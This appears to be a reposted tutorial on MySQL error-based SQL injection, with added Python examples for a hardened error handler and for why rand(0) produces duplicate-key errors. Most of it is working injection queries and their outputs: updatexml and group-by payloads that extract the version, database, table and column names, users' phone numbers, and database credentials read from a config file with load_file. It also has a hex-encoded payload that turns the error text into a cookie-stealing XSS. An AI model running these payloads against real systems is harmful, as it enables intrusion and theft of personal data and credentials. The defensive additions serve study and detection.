MySQL error-based injection

How does an error turn into XSS?

MySQL statements raise errors on the page, leaking information
=========================================================================================================================================================================
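The error channel itself, as an added example that is not part of the original article: a page that prints the raw MySQL error reflects whatever the error text carries, while a hardened handler logs the detail server-side, shows only a reference id, and flags the two error shapes that appear in this article. The function names and sample strings are hypothetical and constructed for illustration; parameterized queries remain the fix for the injection itself.

```python
import html
import logging
import re
import uuid

log = logging.getLogger("db")

# Error shapes from this article's sessions. An ordinary application has no
# reason to produce either, so they are worth alerting on.
SUSPICIOUS = [
    re.compile(r"XPATH syntax error"),                               # ERROR 1105
    re.compile(r"Duplicate entry '.*' for key '<?group_key>?'", re.S),  # ERROR 1062
]

def render_error_vulnerable(db_error):
    """The behaviour the article relies on: raw MySQL error pasted into HTML."""
    return f"<div class='error'>{db_error}</div>"

def render_error_hardened(db_error):
    """Keep the detail in the server log; the client only sees a reference id."""
    ref = uuid.uuid4().hex[:12]
    suspicious = any(p.search(db_error) for p in SUSPICIOUS)
    level = logging.WARNING if suspicious else logging.ERROR
    log.log(level, "db error ref=%s suspicious=%s detail=%r",
            ref, suspicious, db_error)
    page = f"<div class='error'>Something went wrong (ref {html.escape(ref)}).</div>"
    return page, suspicious

# Constructed samples modelled on the error messages shown in the article.
SAMPLE_1062 = ("Duplicate entry '/><img src=\"x\" onerror=alert(document.cookie)>"
               "^0.7' for key 'group_key'")
SAMPLE_1105 = "XPATH syntax error: ':test'"
SAMPLE_BENIGN = "Lost connection to MySQL server during query"

if __name__ == "__main__":
    print(render_error_vulnerable(SAMPLE_1062))   # markup reaches the browser
    for sample in (SAMPLE_1062, SAMPLE_1105, SAMPLE_BENIGN):
        print(render_error_hardened(sample))
```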
*	Error method "updatexml": has a length limit, but does not need to be combined with union.
-	mysql> select updatexml(1, concat(':', 'test'), 1);
	ERROR 1105 (HY000): XPATH syntax error: ':test'
-	mysql> select updatexml(1, concat(0x3a, 'test'), 1);
	ERROR 1105 (HY000): XPATH syntax error: ':test'
-	mysql> select updatexml(1, concat(0x5e, 'test'), 1);
	ERROR 1105 (HY000): XPATH syntax error: '^test'
-	mysql> select * from f_user where id=1 or 1=updatexml(1,concat(0x5e, 'test'),1);
	ERROR 1105 (HY000): XPATH syntax error: '^test'
**	The 'test' above can be replaced with your own subquery or function.

*	group by + rand(0) + having: no length limit, does not need to be combined with union.
-	mysql> select * from f_user where id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0);
	ERROR 1062 (23000): Duplicate entry '5.6.21-log~1' for key 'group_key'

*	Error method "rand+count+group by": needs to be combined with union.
	rand(0) generates the same sequence no matter which machine it runs on or how many times it is run.
	See the bug disclosed in the MySQL developer community: .php?id=8652
-	mysql> select 1,2,count(*),concat('test', char(0x5e), floor(rand(0)*2))x from information_schema.tables group by x;
	ERROR 1062 (23000): Duplicate entry 'test^1' for key 'group_key'
-	mysql> select 1,2,count(*),concat('test', char(0x5e), left(rand(0),3))x from information_schema.tables group by x;
	ERROR 1062 (23000): Duplicate entry 'test^0.7' for key 'group_key'
**	The 'test' above can be replaced with your own subquery or function.

MySQL-to-XSS statement
The hex literal decodes to the HTML that appears in the error text; a page that prints the raw error without escaping renders it as markup.
mysql> select 1,2,count(*),concat((select 0x2F3E3C696D67207372633D226675636B22206F6E6572726F723D616C65727428646F63756D656E742E636F6F6B6965293E), char(0x5e), left(rand(0),3))x from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry '/><img src="fuck" onerror=alert(document.cookie)>^0.7' for key 'group_key'

Dumping the password from the configuration file directly (requires the FILE privilege)
mysql> select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),150,40) ),1);
ERROR 1105 (HY000): XPATH syntax error: ':	'DB_NAME'   => 'fan******un','
mysql> select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),200,40) ),1);
ERROR 1105 (HY000): XPATH syntax error: ':	'DB_USER'   => 's*********b', /'
mysql> select 1,2,3,updatexml(1,concat(char(58),substr(load_file(0x2F616C69646174612F7777772F66616E676A69616E676A756E2F4170706C69636174696F6E2F436F6D6D6F6E2F436F6E662F64622E706870),250,40) ),1);
ERROR 1105 (HY000): XPATH syntax error: ':PWD'    => 'hahahaahhah','

Dumping the version
mysql> select 1,2,3,4 union select distinct concat((select version()),floor(rand(0)*2))a, count(*),3,4 from information_schema.tables group by a;
ERROR 1062 (23000): Duplicate entry '5.6.21-log1' for key 'group_key'

Dumping the database name
mysql> select info();
ERROR 1305 (42000): FUNCTION fangjiangjun.info does not exist
mysql> select count(*), ( concat( (select database()), char(0x5e), floor(rand(0)*2) ) )x from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry 'fangjiangjun^1' for key 'group_key'

Dumping table names
mysql> select concat( (select distinct table_name from information_schema.tables limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry 'CHARACTER_SETS^1' for key 'group_key'
mysql> select concat( (select distinct table_name from information_schema.tables limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry 'COLLATIONS^1' for key 'group_key'
mysql> select concat( (select distinct table_name from information_schema.tables limit 2,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry 'COLLATION_CHARACTER_SET_APPLICABILITY^1' for key 'group_key'
mysql> select concat( (select distinct table_name from information_schema.tables where table_schema='fangjiangjun' limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry 'f_admin^1' for key 'group_key'
mysql> select concat( (select distinct table_name from information_schema.tables where table_schema='fangjiangjun' limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry 'f_admin_role^1' for key 'group_key'

Dumping column names
mysql> select concat( (select distinct column_name from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry 'id^1' for key 'group_key'
mysql> select concat( (select distinct column_name from information_schema.columns where table_schema='fangjiangjun' and table_name='f_user' limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry 'login_time^1' for key 'group_key'

Dumping column values
mysql> select concat( (select mobile_phone from fangjiangjun.f_user order by id limit 0,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry '18602029479^1' for key 'group_key'
mysql> select concat( (select mobile_phone from fangjiangjun.f_user order by id limit 1,1), char(0x5e), floor(rand(0)*2) )x, count(*) from information_schema.tables group by x;
ERROR 1062 (23000): Duplicate entry '15602267509^1' for key 'group_key'
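Why "rand(0) always generates the same sequence" ends in a duplicate-key error, as an added example that is not part of the original article: a simplified model in which GROUP BY evaluates the key expression once to look a group up and again to insert it. The generator constants are a reimplementation assumed to match MySQL for seed 0 only, and all function names are hypothetical.

```python
MAX_VALUE = 0x3FFFFFFF

def rand0_stream():
    """Values of rand(0) in call order (assumed reimplementation, seed 0 only)."""
    seed1, seed2 = 55555555, 0          # generator state after seeding with 0
    while True:
        seed1 = (seed1 * 3 + seed2) % MAX_VALUE
        seed2 = (seed1 + seed2 + 33) % MAX_VALUE
        yield seed1 / MAX_VALUE

def floor_x2(r):
    """concat('test', char(0x5e), floor(rand(0)*2))"""
    return "test^%d" % int(r * 2)

def left_3(r):
    """concat('test', char(0x5e), left(rand(0),3))"""
    return "test^" + f"{r:.17f}"[:3]

def group_by(key_expr, rows):
    """Simplified model of GROUP BY on a temporary table with a unique key.

    Returns (error message or None, number of rows processed)."""
    rnd = rand0_stream()
    counts = {}
    for row in range(1, rows + 1):
        key = key_expr(next(rnd))       # evaluation 1: look the group up
        if key in counts:
            counts[key] += 1
            continue
        key = key_expr(next(rnd))       # evaluation 2: insert the new group
        if key in counts:               # the re-evaluated key already exists
            return f"Duplicate entry '{key}' for key 'group_key'", row
        counts[key] = 1
    return None, rows

if __name__ == "__main__":
    print(group_by(floor_x2, 100))      # fails while processing the third row
    print(group_by(left_3, 100))        # same error text as in the article
    print(group_by(floor_x2, 2))        # two rows are not enough to collide
```

Because the sequence is fixed, the error is reproducible on any server, which is also why the message format is a stable thing to alert on in database and application logs.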

  

Reposted from: .html

Published: 2024-02-01 00:31:14

Article link: https://www.4u4v.net/it/170671867632513.html
